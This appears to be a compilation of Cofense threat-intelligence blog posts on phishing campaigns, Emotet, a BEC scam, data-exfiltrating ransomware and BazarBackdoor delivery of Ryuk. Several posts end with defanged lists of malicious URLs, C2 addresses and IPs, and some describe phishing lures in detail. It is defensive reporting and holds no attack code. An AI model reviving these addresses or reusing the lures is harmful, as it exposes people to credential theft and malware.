Document Sharing Services Represent a Vector for Phishing Campaigns

By Zachary Bailey, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has seen the rise of threat actors impersonating common document-sharing services to harvest credentials. These attacks can also use legitimate services to host malicious documents that are delivered to an unsuspecting employee who trusts the domain where they are hosted 

Some of these attacks do not need to spoof the sender, such as this Adobe phish (Figure 1) that was found in a Proofpoint environment. The email appears merely to include a purchase order with encryption via the Adobe Document Cloud. In the email, Adobe is just one of several components of the phish. It builds credibility by posing as a government agency and suggests that the recipient can sign into Adobe to decrypt the file – or download Acrobat Reader to view it instead.

Figure 1: Email Body 

This email appears to be a forwarded message, as though the recipient is expecting it – FW: Purchase Order 3500250780 as the subject, which also includes the name of the organization sending the PO. A common tactic used by threat actors is to create a fake reply chain by inserting “RE” or “FW” into the subject line to trick the recipient into thinking it is a response to a conversation they initiated or were involved in.  

Even though the address is clearly from a Gmail domain, it is not an uncommon practice for work-related emails to be shared between personal and corporate accounts.  

The email is rather informativelisting the correct postal address and contact information for the government office it is impersonating. As mentioned earlier, the email body says, “To read it you sign into Adobe Document Cloud or download the latest Adobe Acrobat Reader.” Recipients are not urged to sign in but are presented an alternative option that would not put their credentials at risk. The only urgency is regarding “with immediate effect please ensure all invoices are addressed as below”, but that is legitimate information regarding how to address the invoice.   

If the recipient chooses to sign into the Adobe Document Cloud, they will immediately open the document which then launches in their default web browser. This HTML file will pull its resources from Adobe’s website while the pop-up message in Figure 2 delays the victim from seeing the page. JavaScript is embedded in the page to enforce basic password guidelines, which increases the odds that a realistic password is entered into the form. After the user attempts to log on, the HTML file will also send out a POST request with their login information to the threat actor.

Figure 2: Step 1 of Attack 

When the document is inspected by the recipient, its contents are not immediately known. A popup message will cover up the assets being loaded in, which will be read before proceeding. This is not hosted on a website, so checking the URL will not immediately tip off users that something is amiss. To them, they are just viewing a file on their computer. The wording of the popup is “This document is electronically encrypted to the receiver’s email”, which is a strange way of saying that the document can only be unlocked by the recipient. If a user is not familiar with technical terms, it could still sound legitimate to them, but that should be the first hint something is amiss. The second part of the popup urges them to sign in with “authenticated email credentials”, an even more noticeable tip off that this form wants their login information.  

Figure 3: Step 2 of Attack 

After the user clicks through to access the login page, a full webpage appears that looks like the Adobe Document Cloud site. This is still occurring inside of the downloaded document, and the only way to analyze where the form is from – without pressing “sign in” – is to inspect the code itself. To verify where the login information is going, we pulled up the network traffic and sent a request through. Our information is now going to “infiniteworks[.]net/IDI/high.php”, which is not a part of Adobe.  

Figure 4: Final Redirect of Phish  

After exposing their Adobe account credentials to the attacker, the victim is redirected to a new webpage. If they check the URL again, they will discover that they are now in the actual Adobe website. With no new document being unencrypted, they should be fully aware that something is wrong. They should alert their security team immediately 

Indicators of Compromise 

Network IOC   IP   
hXXps://infiniteworks[.]net/IDI/high.php  70[.]40[.]220[.]123 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Variants of Emotet Malware

By Ala Dabat and Adam Martin 

The Cofense Phishing Defense Center (PDC) team has seen a resurgence in the number of Emotet variants in the past few months, with the majority of payloads being delivered via highly obfuscated macros embedded within Microsoft word documents.  

We will be taking a look at an example of Emotet that has managed to bypass Office365 SEGs using simple email layouts with a limited number of red flags usually picked up by traditional spam filtering.  

Figure 1 

A common pattern being observed has involved the number of payload deliveries bypassing traditional security scanning methods through both compressing and password protecting folders containing the malicious file. This makes it impossible for security scan engines to examine folder content. 

Figure 2

Once the password protected file is decompressed the malicious Emotet payload is presented, ready for the target to open. 

Figure 3 

Figure 4 

A calltoaction command is then executed (usually using PowerShell) via heavily obfuscated macros. 

Figure 5 

The call to action then downloads up to several variants of both Emotet and other malware families from a number of different commandandcontrol operations, which is in stark contrast to earlier generations of Emotet malware. Emotet appears to have the capability of exploiting known Windows system vulnerabilities, as well as having the ability to scan Windows directories in order to harvest sensitive data.  

Figure 6 

Following on from the contacted URLs displayed in the above figure, some testing was carried out on payloads downloaded. The URL found iFigure 7 was used as a hosting service for the Emotet sample. This is illustrated by the executable downloaded to the host machine.  

Figure 7 

Once executed, this malicious binary will delete itself from the original folder it was downloaded to, and will terminate its running processes. Then it will create a carbon copy of itself in “/AppData/Local/XBAuthManagerProxy under the name “security.exe.” A comparison of both the original SHA256 and the newly created file confirms they are identical.  

Figure 8 

Dynamic analysis of the dropped executable reveals a host of interesting functions being created and called. Native Windows DLLs associated with networking are utilized for connectivity seen in Figures 9 & 10.

Figure 9 

Figure 10 

Figure 11

A network traffic analysis confirms that information was posted to the aforementioned C2 address.

Figure 12 

Indicators of Compromise 

hxxp://paulospainting[.]com/wp-includes/uhkHig/ 

hxxp://personalizzabili[.]com/images/x04aAql/  

hxxp://goldcoastoffice365[.]com/temp/RAr9U/ 

hxxp://must-in[.]com/wp-admin/kej4f/ 

hxxp://indyoverheaddoors[.]com/wp-includes/sx9SD/ 

 hxxp://giral2[.]com/wp-includes/fj2mDY/  

hxxp://bytecreation[.]es/gestion/hE/174[.]106[.]122[.]139/SMqQhLXYVLsodW/qHPV 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Business Email Compromise (BEC) Scam Advances Alert About Fraud

By Kian Mahdavi and Geraint Williams, Cofense Phishing Defense Center 

The Cofense Phishing Defense Center (PDC) is seeing continued growth in business email compromises (BECs)This is fueled by government grants that have recently been set in place and, as a result, enable SMBs to access finance faster than usual, particularly during the coronavirus pandemic.  

Quite often such attacks tend to target senior executives within organizations, typically due to the authority they have in getting employees to quickly respond to the request. This is completed by using a combination of social engineering tactics, such as urgency to forward confidential data and fear of work suspension (should the employee not do as instructed).

Figure 1  Body of email showcasing interaction  

The email body within Figure 1 reads: “Please get this information, followed by display name of an executive at a global financial firm, with the spoofed emailThis itself may raise red flags to eagle-eyed recipients as the company’s trademarked name is not included in any part of the full email address. Solid social engineering tactics have been utilized, with the attacker providing support to assist with the success of this attack – “can be found on any documents from HMRC …”

The attacker has spoofed law firm located in  North CarolinaSince the TLD is from a legitimate source, not only does it pass basic email security checks, such as SPF, but more importantly it evades existing security measures protected by Microsoft 365 EOP and Proofpoint.  

Furthermore, the opening of the email directly addresses the recipient by first name, as opposed to a generic opening such as, “Good Morning” or “Dear…”, indicating that this is a spear-phishing email that has been hand selected to target one individual.  

Figure 2 – Email header analysis 

If we dive further into the headers as shown above in Figure 2the “reply to” address is actually{redacted}@chckl[.]co[.]uk. chckl – a purchased top-level domain – in an attempt to draw full attention to the innocent law firm. This further provides evidence that the law firm may have had its email servers compromised. In this way, the attacker is filtering out their actual location.   

Typically, such emails target employees within financial departments, simply because of the data they can access. This particular attack does exactly that by harvesting the necessary sensitive information to be used for financial crime.

One can understand how easy it is to fall for such attacks, particularly for individuals who would expect to receive such emails. Attackers are using this to their advantage.  

Indicators of compromise   

Network IOC   IP 
{redacted}@chckl[.]co[.]uk 

{redacted}@{redacted }[.]com 

31[.]54[.]174[.]55 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

At the User’s Expense: Threat Actors Weaponize Companies’ Employee Reimbursements During the Pandemic

By Harsh Patel, Cofense Phishing Defense Center 

With the health crisis that is COVID-19, employees are dutifully working from home. While some already had home offices decked out with dual monitors, printers and the like to complete their jobs, others did not. Because of this many companies took to offering their employees a chance to buy the tools needed for their newly designated remote positions through added reimbursements. 

The Cofense Phishing Defense Center (PDC) has identified a campaign that attempts to steal employee credentials by leveraging reimbursement emails. This campaign was seen across multiple employee groups in the insurance, medical, professional services and banking industries.

Figures 1 and 2: Email Body 

The first thing the recipient will notice is the nickname field displays their company’s name. This will make it appear as if the email originated from within the company to put the recipient at ease about its legitimacy. However, the real sender can be seen right next to it. In this case, it was sent from a compromised account. The “Expense Reimbursement” subject also indicates conversation that would happen between a user and finance to further help with the credibility.

The email body continues to explain the reason for this email, and mentions an attached file with expense reimbursement certification, list of qualified employees and attached reimbursement policy. Although there is no attached file, the email contains a button “CLICK HERE TO REVIEW” with a hyperlink to take the recipient to the phishing landing page.

Figure 3: Phishing Page 

Upon clicking the button found in the email, users are redirected to the page shown in Figure 3. At a glance, it appears to be a login page for Adobe, offering the user options to view, download or send. Note that the email of the recipient is already filled out; the only field left empty is for the password. Despite all these attempts to appear legitimate, this is not the real Adobe login page. The URL in the address bar is not Adobe.com and this isn’t the typical Adobe login users would normally see or receive 

However, should users continue to enter login details, they are redirected to their company’s site as if nothing happened. And that is exactly what threat actors want. These pointless redirects to legitimate documents or company sites have become increasingly common as a way to distract users from the series of spoofed pages and/or actions they have just taken.  

Network Indicators of Compromise  IP   
hXXps://u8824451[.]ct[.]sendgrid[.]net/ls/click?upn=5fYtplO-2FP4S37YYMUNVFFIYhCASYIhBbksOQ-2FihRkfMagXRLczMdDWyGKLdaZ2fGhDy-2F2d9wvh3PmFD5Sd8Ylj1giWERtRpL-2BYsNOHEY5W-2BBEnizS435nr7Iu6j9LQ83iSwjaVHWuQCdmZsBXdcJvA-3D-3Dso-6_92JbB3bEppNSos0IRm49Wrp0NXARSmPYQFezDWMyIFHQkj2X-2FV88He6bzn3ZQbN4zh3Px7vCRVXXJQVUHQKFM6tWC6htmDfIm2iAnxbxF4QYUCwxdxpxyJXzJnEiiVU-2B4RBPNQjJGDMSdA8h3kr8CxAU7MmcKmgZO-2F1dJRFBqLVw6c45Gn27jKYlDGmJUCIAsGGZAJhw-2B0-2Frp-2B9eu1VCNrNiXpM353O-2Fk1OfygI64nk-3D  167[.]89[.]123[.]16 
hXXps://669cee6d14[.]nxcli[.]net/nike/new/dobe/sssx/adobe-RD28/index[.]html  209[.]126[.]25[.]245 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Coronavirus Test Results Return Data-Exfiltrating Ransomware

By Dylan Duncan

Cofense Intelligence has discovered COVID-19-themed phishing campaign that delivers a new version of the Hentai OniChan ransomwareThe new variant, known as King Engine, exfiltrates data and charges a significantly higher ransom than previously analyzed versions of Hentai OniChan. Previous campaigns delivering the Berserker variant of this ransomware used similar phishing emails to target the financial and energy sectors and did not exfiltrate data. Ransomware campaigns that exfiltrate data are becoming more of a common trend as they add to the pressure of paying ransom and reduce the efficacy of file backups. 

The phishing email shown in Figure 1 was found in environments protected by secure email gateways (SEGs) and currently targets the healthcare industry using response subjects allegedly returning patients COVID-19 test results. The spike in coronavirus cases during October has led to more testing and makes this type of phishing campaign even more threatening. This campaign uses common tactics, techniques, and procedures (TTPs) to reach end users and deliver Hentai OniChan ransomware that belongs to the Quimera ransomware family. Though, of course, the addition of data exfiltration, almost certainly to support data leaks should a targeted victim refuse to pay the ransom, is new. This addition highlights a new trend seen in ransomware that is similar to the Avaddon ransomware campaign that was first seen in June and was delivered by the Trik botnet.  

Figure 1  Phishing Email Delivering Hentai OniChan Ransomware. 

Hentai OniChan Ransomware 

Campaigns observed by Cofense that deliver the Hentai OniChan ransomware date back to September and have been found in environments protected by Proofpoint, Symantec, TrendMicro, Microsoft ATP and Cisco IronPort. These campaigns use a common tactic to reach end users by delivering embedded URLs to download an HTML or PDF file. The downloaded files contain components to drop and run the ransomware executable encrypting victims and holding them hostage, promising to provide a decryption application upon receipt of the ransom payment. Once the target’s files are encrypted, a ransom note is provided and a background image, shown in Figure 2, is set explaining the means by which the encrypted user may pay the ransom and regain access to the encrypted data. The ransom note explains to victims affected how to pay the ransom and includes a price, Bitcoin address, timeline and contact email address.

Figure 2  Hentai OniChon Ransom Note 

Berserker v. King Engine 

More ransomware operations have added to the chaos by using data exfiltration. This campaign shows Hentai OniChan has joined the trend.The early stages of the Hentai OniChan ransomware that used the Berserker version did not exfiltrate data, and encrypted files with the .HOR extension. The new strain, King Engine, as of now, has only been seen targeting the healthcare industry and exfiltrates data to an email address found within the ransomware executable. This version encrypts files with a .docm extension and charges a significantly higher ransom of 50 Bitcoin (BTC) (~$650,000 USD), whereas the previous version only charged 10 BTC (~$130,000 USD). Based on our analysis, other ransomware threat actors who have followed the data exfiltration trends often set up data leak websites to publish stolen data if the ransom is not paid. Aof now, data leak websites have not been seen by Hentai OniChan operators 

Indicators of Compromise 

Active Threat Report  Date Published 
80619  2020-10-28 
56658  2020-09-14 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.
sample phish spoofs salesforce to deliver credential phishing link

Phish Found in Proofpoint-Protected Environments – Week ending November 6, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and analyzed and dispositioned by Cofense Triage 

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: Agent Tesla Keylogger 

DESCRIPTION:  Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable. 

TYPE: Remote Access Trojan 

DESCRIPTION: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded OneDrive URLs. 

TYPE: Agent Tesla Keylogger 

DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via embedded URLs. Note: These emails are in Spanish.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

sample phish spoofs salesforce to deliver credential phishing link

Phish Found in Proofpoint-Protected Environments – Week ending October 30, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and analyzed and dispositioned by Cofense Triage 

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: LokiBot

DESCRIPTION: Shipping-spoofing emails found in environments protected by Proofpoint deliver LokiBot via an attached CVE-2017-0199 open XML exploit. The CVE-2017-0199 exploit downloads and runs a DOC file that exploits CVE-2017-11882 to download and run LokiBot.

TYPE: QakBot

DESCRIPTION: Response-themed email found in environments protected by Proofpoint deliver QakBot via malicious Office macros downloaded from an embedded URL.

TYPE: Remote Access Trojan

DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

The Ryuk Threat: Why BazarBackdoor Matters Most

By The Cofense Intelligence Team

Ryuk Ransomware: From TrickBot to BazarBackdoor – What You Need to Know.

Listen in to the latest insights from the Cofense Intelligence experts on this threat and learn how you can defend your business

Watch On-Demand

Yesterday, the Cofense Intelligence team released the following guidance via a flash alert to Cofense Intelligence customers.

On October 28, media reports and U.S. government notifications emerged regarding an active “credible” Ryuk ransomware threat targeting the U.S. healthcare and public health sector, with plans of a coordinated attack October 29. This was reportedly based on chatter observed in an online forum that allegedly included members of the group behind Ryuk. Cofense Intelligence is conducting an ongoing investigation into this threat. While we can’t evaluate the government’s determination of this threat as credible, we are taking this very seriously and have observed increased activity against the healthcare sector. We assess with high confidence that BazarBackdoor is the primary delivery mechanism currently used for Ryuk operations. Moreover, we’ve identified that similar phishing campaigns used to establish a foothold for Ryuk infections have targeted other sectors, as well.

BazarBackdoor: Ryuk’s Inroad

Cofense Intelligence assesses that Ryuk operators typically wait until their preferred delivery mechanism is successfully deployed to an intended target prior to deploying Ryuk ransomware itself. Up until TrickBot’s disruption, Ryuk was most frequently delivered via TrickBot. However, our analysis indicates that the group behind Ryuk began leveraging BazarBackdoor to establish access to target systems in September. This aligns closely with announcements that U.S. Cyber Command had taken action to disrupt TrickBot operations. In recent weeks, we assess with high confidence that BazarBackdoor has been Ryuk’s most predominant loader. With lower confidence, we assess this wave of Ryuk activity may be, in part, in retaliation for September’s TrickBot disruptions.

BazarBackdoor is a stealthy malware downloader that we assess is used by the same group as TrickBot. Typically, emails designed to appear as internal business communications are sent to victims within an organization, often with relevant employee names or positions. These emails usually contain a link, most often to a Google Docs page, though other well-known file hosting platforms have also been used. The Google Docs page will then present a convincing image with another embedded link. This link is typically to a malicious executable hosted on a trusted platform such as Amazon AWS. This chain of legitimate services makes it difficult to detect and stop these campaigns.

Once in place on a victim’s computer, BazarBackdoor uses specialized network communications to avoid detection and to contact its command and control (C2) locations. Part of these communications involve DNS lookups for .bazar domains, which is the reason behind its Bazar name. These C2 locations also often serve as payload locations. After BazarBackdoor contacts its C2 center it will then collect additional information which the threat actors can use to deliver customized reconnaissance tools, such as Cobalt Strike payloads. The threat actors can also choose to deliver other payloads such as Ryuk ransomware. The deployment of Ryuk ransomware isn’t automated, and therefore won’t occur unless the threat actors decide the infected environment is a target.

All of us should pay special heed to any indications of BazarBackdoor compromise. Regardless of whether recent activity is in retaliation against TrickBot’s disruption, what is clear is that recent efforts by multiple parties to cripple TrickBot seem to have been effective in transitioning the Ryuk actors to leveraging BazarBackdoor. We must be mindful that there are past connections between TrickBot activity and Emotet. While there is no direct evidence of current Emotet involvement in these campaigns, we cannot rule out future delivery of Ryuk via Emotet, given historical relationships between TrickBot and Emotet. As the TrickBot infrastructure appears to be in the process of restructuring, we assess that it may find use again as a delivery mechanism. As a network defender, all three malware families should be prioritized when searching for possible compromises, with the highest priority placed on detections of BazarBackdoor in the near future.

Figure 1: Common Phishing Example Delivering BazarBackdoor

The Phish

Cofense Intelligence has directly identified several campaigns, targeting multiple sectors across our customer base, that share strong similarities to the phishing emails reportedly used as initial attack vectors in Ryuk campaigns, as outlined by FireEye. Two subject themes stand out across several industry verticals we’ve confirmed were targets of BazarBackdoor. These subjects relate A) to employment termination, almost always including the word “termination,” or B) to payroll, almost always including the word “debit,” as shown in Figure 1. While the subjects remain the same, we observed two separate download services: via Google Docs or Constant Contact. The following list highlights the different industries we have confirmed were targeted by such campaigns. However, we cannot assess whether Ryuk operators intended to further infect these targets with Ryuk ransomware. It appears very likely that Ryuk operators have cast a wide net for potential infection vectors, and choose which successful footholds to manually interact with and leverage.

Figure 2: Termination List Phishing Example Delivering BazarBackdoor

It is worth noting that these campaigns began in mid-September, which corresponds with the timing of coordinated offensive operations to disrupt TrickBot. The sectors we have directly observed targeted in these campaigns include:

  • Consumer Goods
  • Healthcare
  • Mining
  • Energy
  • Insurance
  • Professional Services
  • Financial Services
  • Manufacturing
  • Retail

Assessing the Threat

As of early this morning, on October 30, there are reports of some ransomware attacks against U.S. healthcare organizations yesterday. It is possible more reports will emerge in the coming days, though initial indications suggest a healthcare sector doomsday was avoided. In recent weeks, there was an abundance of ransomware activity against the healthcare sector, and we identified an increase in BazarBackdoor targeting. It’s not for us to say whether the stated time or scope of the threat was off base, if there have been active successful countermeasures, or that the flurry of reporting has deterred some ransomware activity for now. It is possible they did/do not want to face such a well-guarded and prepared target base. Still, we are confident that Ryuk operations have recently increased, and that other sectors have come into the crosshairs of potential future Ryuk operations. It’s our assessment that the threat should be taken seriously.

Cofense Intelligence customers have received relevant indicators of compromise (IOCs) and Active Threat Reports (ATRs) as these campaigns are identified and analyzed, and some of these ATRs were first sent in September. Customers can find these ATRs and IOCs in ThreatHQ and via our API, and can access the most up to date list of all relevant Cofense Intelligence IOCs and ATRs tied to BazarBackdoor, TrickBot and Emotet via our API and on ThreatHQ.

For all readers, below is a table of relevant IOCs and Yara Rules associated with BazarBackdoor that can help your organization identify related emails should you be targeted. Gain free access to our intel here.

Register now for our live 30 minute briefing on Ryuk Ransomware & What you need to know on Thursday, November 12 at 11:00 am EST.  Listen is as our Cofense Intelligence team provides the latest insights on this threat and learn how you can protect your organization.

Active Threat Reports: BazarBackdoor 
71542 
69892 
67088 
59926 
56548 
56336 
55660 
54647 

 

Embedded URLs 
hxxps://files[.]constantcontact[.]com/0d2efd83801/b5bc005e-db6a-43c8-a967-354f28e66b47[.]pdf 
hxxps://files[.]constantcontact[.]com/0d2efd83801/ca3db959-6b1f-4df9-97b8-13772cbae8e4[.]pdf 
hxxps://files[.]constantcontact[.]com/0d2efd83801/50f95d03-8af1-4396-ac84-d6a7f1212026[.]pdf 
hxxps://files[.]constantcontact[.]com/0d2efd83801/786053b4-4dd9-418b-96bc-84fce4cd00e2[.]pdf 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQsr0bh2i5yJeikTd39t_QfodvTagGLUJNFbMXL_SPvj_x-Pl8WG8pqu6TqQykx9pRsTUvHEuthkWjE/pub 
hxxps://download2020[.]xyz/xls7f283gd283/details_0710p[.]xls 
hxxps://download2112[.]com/xls7f283gd283/details_0610p[.]xls 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRHniSs5Zv8eT2oX5R6UMJPlmNCV_467IH7q9F_o9kwecObMgMt-p99b2ZKtfyXlPF-FdbfP4tArfHh/pub 
hxxps://getfile24[.]com/xlsaf543f/details_0610s[.]xls 
hxxps://getfile24[.]com/do[.]php 
hxxps://download2112[.]com/do[.]php 
hxxps://file2020[.]top/xlsaf543f/details_0710s[.]xls 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQI6-ZsmZthn9cMjphu3xI7yHO2XX-UGoWR5QdzQSY4hY-l0uPL-rVqMg7-Qtf1kjzwGJ0j9ZA3cSHf/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vTGg3jp69iZwWHQt_5iecBhuRO4TFrCqQGFH2SRnL7grlnhfFT_tvxB3b7MtJzcVCVKEjcoDET6WPZ1/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vSdRpDwxW652bF1MBskTuXdU21Vth9Igkq-wj-U2VyputfZw0eXOwEhB_tPm_OyXoqlwbv7JvwzOWN-/pub 
hxxps://file2020[.]top/do[.]php 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vSl5CpqIn8TdaC2meLuo5O2_65-EG7BYAVWGpRfulpB6tcL9n4pWxSvNfMAbU9lCPgyPGJgc_mHl1N6/pub 
hxxps://download2020[.]xyz/do[.]php 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQYIHCkjG5cyJ7LD20aBzlDCkuDspUXDzEHuUOZgceYCzhGuxTr3eS0CHwbgz4rB-z0-tc1PMG-G-Yf/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQihrkch2KlKXWyGgBLOOAUD8mtAQsbd33LRX382DLu29X3yXVqk0u5ZDyAQ1dxJoLAqT243vQA8zG6/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQWDqcUKNBnGdRrsYXzsk1yKMTevNW5TF_DvXV6KJkQcNS40pvDFIaTM3LLvROG270Vl_i-BfemLpeH/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRcBIjcyojojwXhUnGOkJSHcufNT5dBBIeIjaDHJez8DNymddil19LHNH9m9txKwukWi9YweZmIYGbg/pub 
hxxps://drive[.]google[.]com/uc?export=download&id=1S_a_Wl7U6HQqmIuHyTfutFCnllQVLDBO 
hxxps://drive[.]google[.]com/uc?export=download&id=1YKT6EicsRHXPT0ecmt0y–9r-KdC0Vld 
hxxps://drive[.]google[.]com/uc?export=download&confirm=no_antivirus&id=14VEtUrQbmx68Z742YYWaChtdGhejKHwr 
hxxps://tackleadvisors[.]com/AnnualReport[.]exe 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQLld6CHo7dh7xjFodsvCIZoUgi1kChbFWe-HYCU-ehuLX5cW4S0YcIJagtcSIXrXEmLSNEFKkY2Ait/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQ2WZ6MMjC7qPmdB_EFnCyHskJ27X7rLc5pAbyxVJSpKKgcN3Q7j_b45gW6ueLliwJr4nEhVRwAM6AI/pub 
hxxps://drive[.]google[.]com/uc?export=download&id=1UFjla7rs_X9BQw0K0EaylUH2DHkkCLRz 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQl8xkPTC5qcRYddleeD1wWjcL_–hdx0xmAEkwmmMnX6FXnPPI-eTnY7H4kljKVOeNuw_n16-YWE8v/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRD18SMRqTb8GqUi9OeZbeMGgm3qAKfP94U-8CM7s8W1RlA6CmkpJ5ZZaqAzH07yA-rflst4tJiNJ5g/pub 
hxxps://drive[.]google[.]com/uc?export=download&id=1QAxmrZowgewxFboMRcxJHfqB0ZnAiBZl 
hxxps://drive[.]google[.]com/uc?export=download&id=1l2XzQBjyqq3adWQyRJMnHHuBoFKffue0 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQHuwqSVxsGvocUT5pUK9262gOvins1zEvXWnxjeJxqOpXzZhaKj-W6uthqmCN5N-VZW2TLOmW_0I5A/pub 
hxxps://drive[.]google[.]com/uc?export=download&confirm=no_antivirus&id=1lGRZh86DPE59wL4OE07na0Q65YwuLWC9 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vSfT8MMEED7peY9YHyJ653d8JDvjd2EMkAiQgQ6_rEf0HoFffiKjK8-aKIBgxqXJi6wcqjOC5Mq6Pvn/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQpzU5su047G3V2PlnNgoGLChpX_QsCNaSJuarCKSHMISO4eq6vMJcrp0Jgwqwq4BAERrpgbpeiWHrO/pub 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRuzQGE6Z2bu5LOPwejGkGqpJ3GQU2DThVj4BArRlqbIiQCt6Q976Ncydz0NPMXgFgP2kt7PMSHG46e/pub 
hxxps://drive[.]google[.]com/uc?export=download&confirm=no_antivirus&id=1qM01ivzPpKAuwNCbRBRoI2TtV0HkrvJ9 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRKjSRJ8GpqWEk4fINOr4nV31P9VWQ868hfqEZyNb5WhVO9Of_0AFavdwEsmlzu2LRJuNdEEA4ZYlDg/pub 
hxxp://195[.]123[.]241[.]154/fonts[.]php 
hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQorNnj4QnVfP_DFo6G3znMTvbPUnbkWH4QnGmIHAdDcHOCmYjqhsaI0NyUaTEJDQFPp3ZMMaowisPz/pub 
hxxp://docs[.]google[.]com/document/d/e/2PACX-1vRR–Nv_XxP5TyJpc0w4eNrNfWtVlHnMt5nK33ZHtylR5Dl4BXijSwb722XWQXLJObB2gAziS77ZUIM/pub 
hxxp://195[.]123[.]232[.]163/abcf563px3i[.]php 
